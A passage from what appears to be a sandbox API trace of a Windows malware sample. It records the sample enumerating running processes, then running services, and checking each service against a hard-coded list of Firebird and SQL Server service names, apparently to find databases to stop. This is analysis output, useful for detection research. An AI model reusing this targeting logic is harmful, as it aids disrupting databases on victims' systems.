returned 11 [0053.932] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.932] lstrlenW (lpString="svchost.exe") returned 11 [0053.932] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0053.933] lstrlenW (lpString="spoolsv.exe") returned 11 [0053.933] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.934] lstrlenW (lpString="svchost.exe") returned 11 [0053.934] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.934] lstrlenW (lpString="svchost.exe") returned 11 [0053.934] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0053.935] lstrlenW (lpString="audiodg.exe") returned 11 [0053.935] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0053.936] lstrlenW (lpString="sihost.exe") returned 10 [0053.936] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.936] lstrlenW (lpString="svchost.exe") returned 11 [0053.936] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0053.937] lstrlenW (lpString="taskhostw.exe") returned 13 [0053.937] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0053.938] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0053.938] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0053.938] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0053.938] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0053.939] lstrlenW (lpString="explorer.exe") returned 12 [0053.939] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0053.940] lstrlenW (lpString="Memory Compression") returned 18 [0053.940] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0053.940] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0053.940] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0053.941] lstrlenW (lpString="SearchUI.exe") returned 12 [0053.941] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0053.942] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0053.942] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0053.942] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0053.942] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0053.943] lstrlenW (lpString="taskhostw.exe") returned 13 [0053.943] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0053.944] lstrlenW (lpString="UsoClient.exe") returned 13 [0053.944] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0053.944] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0053.945] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0053.945] lstrlenW (lpString="taskhostw.exe") returned 13 [0053.945] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0053.946] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0053.946] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0053.946] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0053.947] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0053.947] lstrlenW (lpString="msoia.exe") returned 9 [0053.947] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0053.948] lstrlenW (lpString="msoia.exe") returned 9 [0053.948] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0053.949] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0053.949] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0053.949] lstrlenW (lpString="screensaver.exe") returned 15 [0053.949] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0053.950] lstrlenW (lpString="xml upper.exe") returned 13 [0053.950] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0053.951] lstrlenW (lpString="defeat preston.exe") returned 18 [0053.951] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0053.953] lstrlenW (lpString="boss isolated.exe") returned 17 [0053.953] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0053.953] lstrlenW (lpString="member.exe") returned 10 [0053.953] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0053.954] lstrlenW (lpString="chubby-er.exe") returned 13 [0053.954] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0053.955] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0053.955] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0053.955] lstrlenW (lpString="organization.exe") returned 16 [0053.955] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0053.956] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0053.956] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0053.957] lstrlenW (lpString="spray-roman.exe") returned 15 [0053.957] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0053.957] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0053.957] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0053.958] lstrlenW (lpString="tank attacks.exe") returned 16 [0053.958] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0053.959] lstrlenW (lpString="wires jacket.exe") returned 16 [0053.959] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0053.960] lstrlenW (lpString="values.exe") returned 10 [0053.960] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0053.961] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0053.961] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0053.961] lstrlenW (lpString="printersaerospace.exe") returned 21 [0053.961] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0053.962] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0053.962] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0053.963] lstrlenW (lpString="dllhost.exe") returned 11 [0053.963] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0053.964] lstrlenW (lpString="joke.exe") returned 8 [0053.964] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0053.965] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0053.965] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0053.966] lstrlenW (lpString="documents.exe") returned 13 [0053.967] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0053.967] lstrlenW (lpString="rebel.exe") returned 9 [0053.967] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0053.968] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0053.968] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.969] lstrlenW (lpString="conhost.exe") returned 11 [0053.969] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.970] lstrlenW (lpString="conhost.exe") returned 11 [0053.970] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0053.970] lstrlenW (lpString="hgaibc.exe") returned 10 [0053.970] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0053.971] lstrlenW (lpString="cmd.exe") returned 7 [0053.971] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0053.972] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0053.972] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.973] lstrlenW (lpString="conhost.exe") returned 11 [0053.973] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.973] lstrlenW (lpString="conhost.exe") returned 11 [0053.973] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.974] lstrlenW (lpString="svchost.exe") returned 11 [0053.974] Process32NextW (in: hSnapshot=0x2c4, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0053.975] CloseHandle (hObject=0x2c4) returned 1 [0053.975] Sleep (dwMilliseconds=0x1f4) [0054.482] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ea98 [0054.482] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0054.483] GetLastError () returned 0xea [0054.483] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x4271068 [0054.483] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4271068, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4271068, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0054.484] CloseServiceHandle (hSCObject=0x60ea98) returned 1 [0054.484] lstrlenW (lpString="Appinfo") returned 7 [0054.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0054.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0054.484] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0054.484] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0054.484] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0054.484] lstrlenW (lpString="AppXSvc") returned 7 [0054.484] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0054.484] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0054.485] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0054.485] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0054.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0054.485] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0054.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.485] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0054.485] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0054.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0054.485] lstrlenW (lpString="Audiosrv") returned 8 [0054.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0054.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0054.485] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0054.485] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0054.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0054.485] lstrlenW (lpString="BFE") returned 3 [0054.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0054.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0054.485] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0054.485] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0054.485] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0054.485] lstrlenW (lpString="BITS") returned 4 [0054.485] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0054.485] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0054.485] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0054.485] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0054.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0054.486] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0054.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0054.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0054.486] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0054.486] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0054.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0054.486] lstrlenW (lpString="CDPSvc") returned 6 [0054.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0054.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0054.486] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0054.486] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0054.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0054.486] 